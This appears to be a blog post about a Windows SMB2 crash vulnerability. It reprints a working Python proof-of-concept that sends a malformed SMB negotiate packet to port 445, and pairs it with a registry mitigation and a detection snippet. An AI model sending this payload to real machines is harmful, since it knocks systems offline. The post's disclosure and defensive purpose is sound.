
VULNERABILITY in Windows SMB2


Yesterday a colleague of mine tweeted about a vulnerability found in the Windows SMB 2.0 implementation. It seemed to be a scary one, since most people use file sharing in Windows: once you switch file sharing on you are an open target for this attack. Well, OK, most people use a firewall nowadays, but anyway.

Later that evening we were both working late, so we decided to try the proof of concept that Laurent Gaffié posted on his blog. It is a simple Python script that opens a TCP connection to port 445 (SMB) and sends a malformed NEGOTIATE PROTOCOL REQUEST. The script looks like this:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"         # Process ID High: -> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

We used a clean installation of Windows Server 2008 SP2 that we happened to have running on a VMware hypervisor. Crash, boom, bang. The server showed an ugly blue screen of death instantly. It is just a matter of time before someone exploits this vulnerability for remote code execution. So if you are a Windows guy you should temporarily switch off SMB2 until Microsoft releases a security update for this. This can be done via the registry:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
"SMB2"=dword:00000000
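Besides switching SMB2 off, it helps to be able to spot the malformed request on the wire. The following Python 3 snippet is an added example (not part of the original post or Gaffié's PoC): it parses the NetBIOS session header and the SMB1 header of a captured request, pulls out the Process ID High field that the script above sets to "\x00\x26", and flags a NEGOTIATE request whose value is not the normal 0x0000. The two sample packets are constructed here, not captured traffic.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72


def parse_smb1(data):
    """Parse a NetBIOS session message carrying an SMB1 header (first 36 bytes).

    Returns a dict of header fields, or None if the bytes are not an SMB1 message.
    Offsets relative to the 0xFF 'S' 'M' 'B' magic (SMB1 header layout):
    command(4) status(5) flags(9) flags2(10) pid_high(12) signature(14)
    reserved(22) tid(24) pid_low(26) uid(28) mid(30).
    """
    if len(data) < 36 or data[0] != 0x00 or data[4:8] != SMB1_MAGIC:
        return None
    nb_len = int.from_bytes(data[1:4], "big")  # NetBIOS session length field
    hdr = data[4:36]
    flags2, pid_high = struct.unpack_from("<HH", hdr, 10)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", hdr, 24)
    return {"nb_len": nb_len, "command": hdr[4], "flags": hdr[9], "flags2": flags2,
            "pid_high": pid_high, "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid}


def check_negotiate(data):
    """Return (is_suspicious, reason) for one captured SMB request.

    A NEGOTIATE PROTOCOL REQUEST normally carries Process ID High == 0x0000;
    the crash described in the post is triggered by a nonzero value there.
    """
    h = parse_smb1(data)
    if h is None:
        return False, "not an SMB1 session message"
    if h["command"] != SMB_COM_NEGOTIATE:
        return False, "not a NEGOTIATE request"
    if h["pid_high"] != 0:
        return True, "NEGOTIATE with nonzero Process ID High: 0x%04x" % h["pid_high"]
    return False, "NEGOTIATE with normal header"


# Constructed samples (not captured traffic): NetBIOS header (length 58), SMB1
# header, word count 0, byte count 23, and two dialect strings.
_PREFIX = b"\x00\x00\x00\x3a" + SMB1_MAGIC + b"\x72\x00\x00\x00\x00\x18\x53\xc8"
_SUFFIX = (b"\x00" * 8 + b"\x00\x00\xff\xff\xff\xfe\x00\x00\x00\x00"
           + b"\x00\x17\x00" + b"\x02NT LM 0.12\x00\x02SMB 2.002\x00")
SAMPLE_NORMAL = _PREFIX + b"\x00\x00" + _SUFFIX     # Process ID High = 0x0000
SAMPLE_MALFORMED = _PREFIX + b"\x00\x26" + _SUFFIX  # Process ID High bytes 00 26

if __name__ == "__main__":
    for name, pkt in (("normal", SAMPLE_NORMAL), ("malformed", SAMPLE_MALFORMED)):
        print(name, check_negotiate(pkt))
```

Feed it the first 36 bytes of each TCP/445 request seen by a sensor; anything it flags is worth an alert, since a legitimate client has no reason to set that field in a negotiate.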

Today Microsoft confirmed the vulnerability and said that it does not apply to the RTM version of Windows 7; only the RC is affected. This evening I installed a clean Windows 7 in my office and I can confirm that it does not have this vulnerability. This morning another colleague of mine had a strange blue screen of death experience on his laptop, so you can be sure that it affects Vista as well. Yes, I gave him a warning first… ;)
